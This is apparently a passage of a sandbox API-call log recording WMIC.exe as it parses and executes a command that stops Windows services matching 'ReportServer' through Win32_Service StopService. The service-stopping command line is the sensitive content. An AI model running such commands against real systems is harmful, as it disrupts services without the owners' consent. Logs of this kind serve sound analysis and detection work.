returned 0x11 [0308.340] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0308.340] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0308.340] malloc (_Size=0x18) returned 0x3512b08 [0308.340] IUnknown:Release (This=0x3506b88) returned 0x0 [0308.340] IUnknown:Release (This=0x3509fa8) returned 0x0 [0308.340] IUnknown:Release (This=0x3509ff8) returned 0x0 [0308.340] IXMLDOMNodeList:get_item (in: This=0x3509ca0, index=18, listItem=0x30afcd8 | out: listItem=0x30afcd8*=0x3506b88) returned 0x0 [0308.340] IXMLDOMNode:get_text (in: This=0x3506b88, text=0x30afcdc | out: text=0x30afcdc*="mof.xsl") returned 0x0 [0308.340] IXMLDOMNode:get_attributes (in: This=0x3506b88, attributeMap=0x30afcd4 | out: attributeMap=0x30afcd4*=0x3509fa8) returned 0x0 [0308.340] malloc (_Size=0xc) returned 0x351ab58 [0308.341] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3509fa8, name="KEYWORD", namedItem=0x30afcd0 | out: namedItem=0x30afcd0*=0x3509ff8) returned 0x0 [0308.341] free (_Block=0x351ab58) [0308.341] IXMLDOMNode:get_nodeValue (in: This=0x3509ff8, value=0x30afc90 | out: value=0x30afc90*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat", varVal2=0x0)) returned 0x0 [0308.341] malloc (_Size=0xc) returned 0x351acc0 [0308.341] malloc (_Size=0xc) returned 0x351ad98 [0308.341] SysStringLen (param_1="wmiclimofformat") returned 0xf [0308.341] SysStringLen (param_1="TABLE") returned 0x5 [0308.341] SysStringLen (param_1="wmiclimofformat") returned 0xf [0308.341] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0308.341] SysStringLen (param_1="wmiclimofformat") returned 0xf [0308.341] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0308.341] SysStringLen (param_1="wmiclimofformat") returned 0xf [0308.341] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0308.341] SysStringLen (param_1="wmiclimofformat") returned 0xf [0308.341] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0308.341] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0308.341] SysStringLen (param_1="wmiclimofformat") returned 0xf [0308.341] malloc (_Size=0x18) returned 0x3512d48 [0308.341] IUnknown:Release (This=0x3506b88) returned 0x0 [0308.341] IUnknown:Release (This=0x3509fa8) returned 0x0 [0308.341] IUnknown:Release (This=0x3509ff8) returned 0x0 [0308.341] IXMLDOMNodeList:get_item (in: This=0x3509ca0, index=19, listItem=0x30afcd8 | out: listItem=0x30afcd8*=0x3506b88) returned 0x0 [0308.342] IXMLDOMNode:get_text (in: This=0x3506b88, text=0x30afcdc | out: text=0x30afcdc*="textvaluelist.xsl") returned 0x0 [0308.342] IXMLDOMNode:get_attributes (in: This=0x3506b88, attributeMap=0x30afcd4 | out: attributeMap=0x30afcd4*=0x3509fa8) returned 0x0 [0308.342] malloc (_Size=0xc) returned 0x351ab58 [0308.342] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3509fa8, name="KEYWORD", namedItem=0x30afcd0 | out: namedItem=0x30afcd0*=0x3509ff8) returned 0x0 [0308.342] free (_Block=0x351ab58) [0308.342] IXMLDOMNode:get_nodeValue (in: This=0x3509ff8, value=0x30afc90 | out: value=0x30afc90*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat.xsl", varVal2=0x0)) returned 0x0 [0308.342] malloc (_Size=0xc) returned 0x351acd8 [0308.342] malloc (_Size=0xc) returned 0x351ad08 [0308.342] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0308.342] SysStringLen (param_1="TABLE") returned 0x5 [0308.342] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0308.342] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0308.342] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0308.342] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0308.342] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0308.342] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0308.342] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0308.342] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0308.342] malloc (_Size=0x18) returned 0x3512be8 [0308.343] IUnknown:Release (This=0x3506b88) returned 0x0 [0308.343] IUnknown:Release (This=0x3509fa8) returned 0x0 [0308.343] IUnknown:Release (This=0x3509ff8) returned 0x0 [0308.343] IXMLDOMNodeList:get_item (in: This=0x3509ca0, index=20, listItem=0x30afcd8 | out: listItem=0x30afcd8*=0x3506b88) returned 0x0 [0308.343] IXMLDOMNode:get_text (in: This=0x3506b88, text=0x30afcdc | out: text=0x30afcdc*="textvaluelist.xsl") returned 0x0 [0308.343] IXMLDOMNode:get_attributes (in: This=0x3506b88, attributeMap=0x30afcd4 | out: attributeMap=0x30afcd4*=0x3509fa8) returned 0x0 [0308.343] malloc (_Size=0xc) returned 0x351adf8 [0308.343] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3509fa8, name="KEYWORD", namedItem=0x30afcd0 | out: namedItem=0x30afcd0*=0x3509ff8) returned 0x0 [0308.343] free (_Block=0x351adf8) [0308.343] IXMLDOMNode:get_nodeValue (in: This=0x3509ff8, value=0x30afc90 | out: value=0x30afc90*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat", varVal2=0x0)) returned 0x0 [0308.343] malloc (_Size=0xc) returned 0x351ad20 [0308.343] malloc (_Size=0xc) returned 0x351aca8 [0308.343] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0308.343] SysStringLen (param_1="TABLE") returned 0x5 [0308.343] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0308.343] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0308.343] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0308.343] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0308.343] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0308.343] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0308.344] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0308.344] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0308.344] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0308.344] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0308.344] malloc (_Size=0x18) returned 0x3512d68 [0308.344] IUnknown:Release (This=0x3506b88) returned 0x0 [0308.344] IUnknown:Release (This=0x3509fa8) returned 0x0 [0308.344] IUnknown:Release (This=0x3509ff8) returned 0x0 [0308.344] IUnknown:Release (This=0x3509ca0) returned 0x0 [0308.344] FreeThreadedDOMDocument:IUnknown:Release (This=0x3506b48) returned 0x1 [0308.344] FreeThreadedDOMDocument:IUnknown:Release (This=0x35045a8) returned 0x0 [0308.344] free (_Block=0x3519868) [0308.344] GetCommandLineW () returned="\"C:\\WINDOWS\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%ReportServer%%'\" call stopservice" [0308.344] malloc (_Size=0xe0) returned 0x351aee8 [0308.344] memcpy_s (in: _Destination=0x351aee8, _DestinationSize=0xde, _Source=0x3181b78, _SourceSize=0xd8 | out: _Destination=0x351aee8) returned 0x0 [0308.344] malloc (_Size=0xc) returned 0x351adb0 [0308.344] malloc (_Size=0xc) returned 0x351adf8 [0308.344] malloc (_Size=0xc) returned 0x351ab28 [0308.344] malloc (_Size=0xc) returned 0x351ac00 [0308.345] malloc (_Size=0x80) returned 0x351afd0 [0308.345] GetLocalTime (in: lpSystemTime=0x30afc74 | out: lpSystemTime=0x30afc74*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x2, wHour=0x8, wMinute=0x1d, wSecond=0xe, wMilliseconds=0x186)) [0308.345] _vsnwprintf (in: _Buffer=0x351afd0, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0x30afc54 | out: _Buffer="04-02-2020T08:29:14") returned 19 [0308.345] lstrlenW (lpString=" path Win32_Service where \"name like '%%ReportServer%%'\" call stopservice") returned 73 [0308.345] malloc (_Size=0x94) returned 0x351b058 [0308.345] lstrlenW (lpString=" path Win32_Service where \"name like '%%ReportServer%%'\" call stopservice") returned 73 [0308.345] lstrlenW (lpString=" path Win32_Service where \"name like '%%ReportServer%%'\" call stopservice") returned 73 [0308.345] malloc (_Size=0x94) returned 0x351b0f8 [0308.345] lstrlenW (lpString=" path Win32_Service where \"name like '%%ReportServer%%'\" call stopservice") returned 73 [0308.345] lstrlenW (lpString=" path Win32_Service where \"name like '%%ReportServer%%'\" call stopservice") returned 73 [0308.345] lstrlenW (lpString=" path Win32_Service where \"name like '%%ReportServer%%'\" call stopservice") returned 73 [0308.345] malloc (_Size=0xa) returned 0x351ab58 [0308.345] lstrlenW (lpString="path") returned 4 [0308.345] _wcsicmp (_String1="path", _String2="\"NULL\"") returned 78 [0308.345] malloc (_Size=0xa) returned 0x351ac30 [0308.345] malloc (_Size=0x4) returned 0x3512ed8 [0308.345] free (_Block=0x0) [0308.345] free (_Block=0x351ab58) [0308.345] lstrlenW (lpString=" path Win32_Service where \"name like '%%ReportServer%%'\" call stopservice") returned 73 [0308.345] malloc (_Size=0x1c) returned 0x3519da8 [0308.345] lstrlenW (lpString="Win32_Service") returned 13 [0308.345] _wcsicmp (_String1="Win32_Service", _String2="\"NULL\"") returned 85 [0308.345] malloc (_Size=0x1c) returned 0x351b198 [0308.345] malloc (_Size=0x8) returned 0x3512ee8 [0308.345] memmove_s (in: _Destination=0x3512ee8, _DestinationSize=0x4, _Source=0x3512ed8, _SourceSize=0x4 | out: _Destination=0x3512ee8) returned 0x0 [0308.345] free (_Block=0x3512ed8) [0308.345] free (_Block=0x0) [0308.345] free (_Block=0x3519da8) [0308.345] lstrlenW (lpString=" path Win32_Service where \"name like '%%ReportServer%%'\" call stopservice") returned 73 [0308.345] malloc (_Size=0xc) returned 0x351ab10 [0308.345] lstrlenW (lpString="where") returned 5 [0308.346] _wcsicmp (_String1="where", _String2="\"NULL\"") returned 85 [0308.346] malloc (_Size=0xc) returned 0x351ab58 [0308.346] malloc (_Size=0xc) returned 0x351ac48 [0308.346] memmove_s (in: _Destination=0x351ac48, _DestinationSize=0x8, _Source=0x3512ee8, _SourceSize=0x8 | out: _Destination=0x351ac48) returned 0x0 [0308.346] free (_Block=0x3512ee8) [0308.346] free (_Block=0x0) [0308.346] free (_Block=0x351ab10) [0308.346] lstrlenW (lpString=" path Win32_Service where \"name like '%%ReportServer%%'\" call stopservice") returned 73 [0308.346] malloc (_Size=0x3e) returned 0x351b1c0 [0308.346] lstrlenW (lpString="\"name like '%%ReportServer%%'\"") returned 30 [0308.346] _wcsicmp (_String1="\"name like '%%ReportServer%%'\"", _String2="\"NULL\"") returned -20 [0308.346] lstrlenW (lpString="\"name like '%%ReportServer%%'\"") returned 30 [0308.346] lstrlenW (lpString="\"name like '%%ReportServer%%'\"") returned 30 [0308.346] malloc (_Size=0x3e) returned 0x351b208 [0308.346] malloc (_Size=0x10) returned 0x351ab10 [0308.346] memmove_s (in: _Destination=0x351ab10, _DestinationSize=0xc, _Source=0x351ac48, _SourceSize=0xc | out: _Destination=0x351ab10) returned 0x0 [0308.346] free (_Block=0x351ac48) [0308.346] free (_Block=0x0) [0308.346] free (_Block=0x351b1c0) [0308.346] lstrlenW (lpString=" path Win32_Service where \"name like '%%ReportServer%%'\" call stopservice") returned 73 [0308.346] malloc (_Size=0xa) returned 0x351ac48 [0308.346] lstrlenW (lpString="call") returned 4 [0308.346] _wcsicmp (_String1="call", _String2="\"NULL\"") returned 65 [0308.346] malloc (_Size=0xa) returned 0x351ac60 [0308.346] malloc (_Size=0x18) returned 0x3512c68 [0308.346] memmove_s (in: _Destination=0x3512c68, _DestinationSize=0x10, _Source=0x351ab10, _SourceSize=0x10 | out: _Destination=0x3512c68) returned 0x0 [0308.346] free (_Block=0x351ab10) [0308.346] free (_Block=0x0) [0308.346] free (_Block=0x351ac48) [0308.346] lstrlenW (lpString=" path Win32_Service where \"name like '%%ReportServer%%'\" call stopservice") returned 73 [0308.346] malloc (_Size=0x18) returned 0x3512a28 [0308.346] lstrlenW (lpString="stopservice") returned 11 [0308.346] _wcsicmp (_String1="stopservice", _String2="\"NULL\"") returned 81 [0308.346] malloc (_Size=0x18) returned 0x3512b88 [0308.347] free (_Block=0x0) [0308.347] free (_Block=0x3512a28) [0308.347] malloc (_Size=0x18) returned 0x3512ba8 [0308.347] lstrlenW (lpString="QUIT") returned 4 [0308.347] lstrlenW (lpString="path") returned 4 [0308.347] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="QUIT", cchCount2=4) returned 1 [0308.347] lstrlenW (lpString="EXIT") returned 4 [0308.347] lstrlenW (lpString="path") returned 4 [0308.347] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="EXIT", cchCount2=4) returned 3 [0308.347] free (_Block=0x3512ba8) [0308.347] WbemLocator:IUnknown:AddRef (This=0x31948d8) returned 0x2 [0308.347] malloc (_Size=0x18) returned 0x3512a28 [0308.347] lstrlenW (lpString="/") returned 1 [0308.347] lstrlenW (lpString="path") returned 4 [0308.347] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="/", cchCount2=1) returned 3 [0308.347] lstrlenW (lpString="-") returned 1 [0308.347] lstrlenW (lpString="path") returned 4 [0308.347] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="-", cchCount2=1) returned 3 [0308.347] lstrlenW (lpString="CLASS") returned 5 [0308.347] lstrlenW (lpString="path") returned 4 [0308.347] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="CLASS", cchCount2=5) returned 3 [0308.347] lstrlenW (lpString="PATH") returned 4 [0308.347] lstrlenW (lpString="path") returned 4 [0308.347] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="PATH", cchCount2=4) returned 2 [0308.347] lstrlenW (lpString="/") returned 1 [0308.347] lstrlenW (lpString="Win32_Service") returned 13 [0308.347] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Win32_Service", cchCount1=13, lpString2="/", cchCount2=1) returned 3 [0308.347] lstrlenW (lpString="-") returned 1 [0308.347] lstrlenW (lpString="Win32_Service") returned 13 [0308.347] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Win32_Service", cchCount1=13, lpString2="-", cchCount2=1) returned 3 [0308.348] lstrlenW (lpString="Win32_Service") returned 13 [0308.348] malloc (_Size=0x1c) returned 0x3519da8 [0308.348] lstrlenW (lpString="Win32_Service") returned 13 [0308.348] wcstok (in: _String="Win32_Service", _Delimiter=".", _Context=0xdcc7bbc4 | out: _String="Win32_Service", _Context=0xdcc7bbc4) returned="Win32_Service" [0308.348] lstrlenW (lpString="Win32_Service") returned 13 [0308.348] malloc (_Size=0x1c) returned 0x351b1c0 [0308.348] lstrlenW (lpString="Win32_Service") returned 13 [0308.348] wcstok (in: _String=0x0, _Delimiter=",", _Context=0xdcc7bbc4 | out: _String=0x0, _Context=0xdcc7bbc4) returned 0x0 [0308.348] lstrlenW (lpString="") returned 0 [0308.348] lstrlenW (lpString="WHERE") returned 5 [0308.348] lstrlenW (lpString="where") returned 5 [0308.348] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="where", cchCount1=5, lpString2="WHERE", cchCount2=5) returned 2 [0308.348] lstrlenW (lpString="/") returned 1 [0308.348] lstrlenW (lpString="name like '%%ReportServer%%'") returned 28 [0308.348] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="name like '%%ReportServer%%'", cchCount1=28, lpString2="/", cchCount2=1) returned 3 [0308.348] lstrlenW (lpString="-") returned 1 [0308.348] lstrlenW (lpString="name like '%%ReportServer%%'") returned 28 [0308.348] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="name like '%%ReportServer%%'", cchCount1=28, lpString2="-", cchCount2=1) returned 3 [0308.348] lstrlenW (lpString="name like '%%ReportServer%%'") returned 28 [0308.348] malloc (_Size=0x3a) returned 0x351b250 [0308.348] lstrlenW (lpString="name like '%%ReportServer%%'") returned 28 [0308.348] lstrlenW (lpString="/") returned 1 [0308.348] lstrlenW (lpString="call") returned 4 [0308.348] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="/", cchCount2=1) returned 3 [0308.348] lstrlenW (lpString="-") returned 1 [0308.349] lstrlenW (lpString="call") returned 4 [0308.349] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="-", cchCount2=1) returned 3 [0308.349] lstrlenW (lpString="call") returned 4 [0308.349] malloc (_Size=0xa) returned 0x351ac48 [0308.349] lstrlenW (lpString="call") returned 4 [0308.349] lstrlenW (lpString="GET") returned 3 [0308.349] lstrlenW (lpString="call") returned 4 [0308.349] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0308.349] lstrlenW (lpString="LIST") returned 4 [0308.350] lstrlenW (lpString="call") returned 4 [0308.350] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0308.350] lstrlenW (lpString="SET") returned 3 [0308.350] lstrlenW (lpString="call") returned 4 [0308.350] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0308.350] lstrlenW (lpString="CREATE") returned 6 [0308.350] lstrlenW (lpString="call") returned 4 [0308.350] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0308.350] lstrlenW (lpString="CALL") returned 4 [0308.350] lstrlenW (lpString="call") returned 4 [0308.350] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0308.350] lstrlenW (lpString="/") returned 1 [0308.350] lstrlenW (lpString="stopservice") returned 11 [0308.350] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="/", cchCount2=1) returned 3 [0308.350] lstrlenW (lpString="-") returned 1 [0308.350] lstrlenW (lpString="stopservice") returned 11 [0308.350] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="-", cchCount2=1) returned 3 [0308.350] lstrlenW (lpString="stopservice") returned 11 [0308.350] malloc (_Size=0x18) returned 0x3512da8 [0308.350] lstrlenW (lpString="stopservice") returned 11 [0308.350] ??0CHString@@QAE@XZ () returned 0x30adb3c [0308.350] GetCurrentThreadId () returned 0x12d4 [0308.350] GetCurrentThreadId () returned 0x12d4 [0308.350] ??0CHString@@QAE@XZ () returned 0x30adac4 [0308.350] malloc (_Size=0x4) returned 0x351b1e8 [0308.350] malloc (_Size=0xc) returned 0x351ab10 [0308.350] malloc (_Size=0xc) returned 0x351aea0 [0308.350] WbemLocator:IWbemLocator:ConnectServer (in: This=0x31948d8, strNetworkResource="root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xa68518 | out: ppNamespace=0xa68518*=0x319ac28) returned 0x0 [0308.409] free (_Block=0x351aea0) [0308.409] CoSetProxyBlanket (pProxy=0x319ac28, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0308.409] free (_Block=0x351b1e8) [0308.410] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0308.410] free (_Block=0x351ab10) [0308.410] malloc (_Size=0xc) returned 0x351ab10 [0308.410] IWbemServices:GetObject (in: This=0x319ac28, strObjectPath="Win32_Service", lFlags=131072, pCtx=0x0, ppObject=0x30adb54*=0x0, ppCallResult=0x0 | out: ppObject=0x30adb54*=0x31f03a8, ppCallResult=0x0) returned 0x0 [0308.469] free (_Block=0x351ab10) [0308.469] IWbemClassObject:BeginMethodEnumeration (This=0x31f03a8, lEnumFlags=0) returned 0x0 [0308.469] IWbemClassObject:NextMethod (in: This=0x31f03a8, lFlags=0, pstrName=0x30adb60*=0x0, ppInSignature=0x30adb5c*=0x0, ppOutSignature=0x30adb58*=0x0 | out: pstrName=0x30adb60*="StartService", ppInSignature=0x30adb5c*=0x0, ppOutSignature=0x30adb58*=0x31f05a0) returned 0x0 [0308.469] lstrlenW (lpString="StartService") returned 12 [0308.469] lstrlenW (lpString="stopservice") returned 11 [0308.469] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="StartService", cchCount2=12) returned 3 [0308.469] IUnknown:Release (This=0x31f05a0) returned 0x0 [0308.469] IWbemClassObject:NextMethod (in: This=0x31f03a8, lFlags=0, pstrName=0x30adb60*=0x0, ppInSignature=0x30adb5c*=0x0, ppOutSignature=0x30adb58*=0x0 | out: pstrName=0x30adb60*="StopService", ppInSignature=0x30adb5c*=0x0, ppOutSignature=0x30adb58*=0x31f05a0) returned 0x0 [0308.469] lstrlenW (lpString="StopService") returned 11 [0308.469] lstrlenW (lpString="stopservice") returned 11 [0308.469] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="StopService", cchCount2=11) returned 2 [0308.469] malloc (_Size=0x38) returned 0x351ba08 [0308.469] ??0CHString@@QAE@XZ () returned 0x30ad6a4 [0308.470] GetCurrentThreadId () returned 0x12d4 [0308.470] IWbemClassObject:GetNames (in: This=0x31f05a0, wszQualifierName=0x0, lFlags=64, pQualifierVal=0x0, pNames=0x30ad6b4 | out: pNames=0x30ad6b4*="\x01ƀ\x04") returned 0x0 [0308.470] SafeArrayGetLBound (in: psa=0x31f0c58, nDim=0x1, plLbound=0x30ad6a0 | out: plLbound=0x30ad6a0) returned 0x0 [0308.470] SafeArrayGetUBound (in: psa=0x31f0c58, nDim=0x1, plUbound=0x30ad69c | out: plUbound=0x30ad69c) returned 0x0 [0308.470] SafeArrayGetElement (in: psa=0x31f0c58, rgIndices=0x30ad6a8, pv=0x30ad6b8 | out: pv=0x30ad6b8) returned 0x0 [0308.470] malloc (_Size=0x24) returned 0x351ba48 [0308.471] IWbemClassObject:GetPropertyQualifierSet (in: This=0x31f05a0, wszProperty="ReturnValue", ppQualSet=0x30ad5c8 | out: ppQualSet=0x30ad5c8*=0x319b138) returned 0x0 [0308.471] malloc (_Size=0xc) returned 0x351ab10 [0308.471] IWbemQualifierSet:Get (in: This=0x319b138, wszName="CIMTYPE", lFlags=0, pVal=0x30ad598*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x30ad598*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="uint32", varVal2=0x0), plFlavor=0x0) returned 0x0 [0308.471] free (_Block=0x351ab10) [0308.471] malloc (_Size=0xc) returned 0x351ab10 [0308.471] IWbemClassObject:Get (in: This=0x31f05a0, wszName="ReturnValue", lFlags=0, pVal=0x30ad570*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x30ad5ac*=51041684, plFlavor=0x0 | out: pVal=0x30ad570*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x30ad5ac*=19, plFlavor=0x0) returned 0x0 [0308.471] malloc (_Size=0xc) returned 0x351ae58 [0308.471] IWbemQualifierSet:Get (in: This=0x319b138, wszName="read", lFlags=0, pVal=0x30ad5b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x30ad5b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0308.471] free (_Block=0x351ae58) [0308.471] malloc (_Size=0xc) returned 0x351ae88 [0308.472] IWbemQualifierSet:Get (in: This=0x319b138, wszName="write", lFlags=0, pVal=0x30ad5b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x30ad5b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0308.472] free (_Block=0x351ae88) [0308.472] malloc (_Size=0xc) returned 0x351aeb8 [0308.472] malloc (_Size=0xc) returned 0x351aed0 [0308.472] IWbemQualifierSet:Get (in: This=0x319b138, wszName="Description", lFlags=0, pVal=0x30ad588*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x30ad588*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0308.472] free (_Block=0x351aed0) [0308.472] malloc (_Size=0xc) returned 0x351aed0 [0308.472] lstrlenA (lpString="Not Available") returned 13 [0308.472] malloc (_Size=0x1c) returned 0x351ba78 [0308.472] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa21d94, cbMultiByte=-1, lpWideCharStr=0x351ba78, cchWideChar=14 | out: lpWideCharStr="Not Available") returned 14 [0308.472] free (_Block=0x351ba78) [0308.472] IUnknown:Release (This=0x319b138) returned 0x0 [0308.472] malloc (_Size=0x24) returned 0x351ba78 [0308.472] malloc (_Size=0xc) returned 0x351ae10 [0308.472] malloc (_Size=0x24) returned 0x351baa8 [0308.472] malloc (_Size=0x38) returned 0x351bad8 [0308.472] malloc (_Size=0x24) returned 0x351bb18 [0308.472] free (_Block=0x351baa8) [0308.472] free (_Block=0x351ba78) [0308.472] free (_Block=0x351ba48) [0308.472] free (_Block=0x351aeb8) [0308.472] free (_Block=0x351aed0) [0308.473] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0308.473] IWbemClassObject:GetMethodQualifierSet (in: This=0x31f03a8, wszMethod="StopService", ppQualSet=0x30adabc | out: ppQualSet=0x30adabc*=0x31c43d8) returned 0x0 [0308.473] malloc (_Size=0xc) returned 0x351aea0 [0308.473] IWbemQualifierSet:Get (in: This=0x31c43d8, wszName="Implemented", lFlags=0, pVal=0x30adaa4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x30adaa4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0308.473] free (_Block=0x351aea0) [0308.473] malloc (_Size=0xc) returned 0x351aea0 [0308.473] malloc (_Size=0xc) returned 0x351ae70 [0308.473] IWbemQualifierSet:Get (in: This=0x31c43d8, wszName="Description", lFlags=0, pVal=0x30ada94*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x30ada94*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The StopService method places the service in the stopped state. It returns an integer value of 0 if the service was successfully stopped, 1 if the request is not supported, and any other number to indicate an error. It returns one of the following integer values:\n0 - The request was accepted.\n1 - The request is not supported.\n2 - The user did not have the necessary access.\n3 - The service cannot be stopped because other services that are running are dependent on it.\n4 - The requested control code is not valid, or it is unacceptable to the service.\n5 - The requested control code cannot be sent to the service because the state of the service (Win32_BaseService:State) is equal to 0, 1, or 2.\n6 - The service has not been started.\n7 - The service did not respond to the start request in a timely fashion.\n8 - Unknown failure when starting the service.\n9 - The directory path to the service executable was not found.\n10 - The service is already running.\n11 - The database to add a new service is locked.\n12 - A dependency for which this service relies on has been removed from the system.\n13 - The service failed to find the service needed from a dependent service.\n14 - The service has been disabled from the system.\n15 - The service does not have the correct authentication to run on the system.\n16 - This service is being removed from the system.\n17 - There is no execution thread for the service.\n18 - There are circular dependencies when starting the service.\n19 - There is a service running under the same name.\n20 - There are invalid characters in the name of the service.\n21 - Invalid parameters have been passed to the service.\n22 - The account, which this service is to run under is either invalid or lacks the permissions to run the service.\n23 - The service exists in the database of services available from the system.\n24 - The service is currently paused in the system.\nOther - For integer values other than those listed above, refer to Win32 error code documentation.", varVal2=0x0), plFlavor=0x0) returned 0x0 [0308.474] free (_Block=0x351ae70) [0308.474] malloc (_Size=0xc) returned 0x351aeb8 [0308.474] IUnknown:Release (This=0x31c43d8) returned 0x0 [0308.474] malloc (_Size=0x38) returned 0x351ba48 [0308.474] malloc (_Size=0x38) returned 0x351ba88 [0308.474] malloc (_Size=0x24) returned 0x351bb48 [0308.474] malloc (_Size=0xc) returned 0x351aed0 [0308.474] malloc (_Size=0x38) returned 0x351bb78 [0308.474] malloc (_Size=0x38) returned 0x351bbb8 [0308.474] malloc (_Size=0x24) returned 0x351bbf8 [0308.474] malloc (_Size=0x28) returned 0x351bc28 [0308.474] 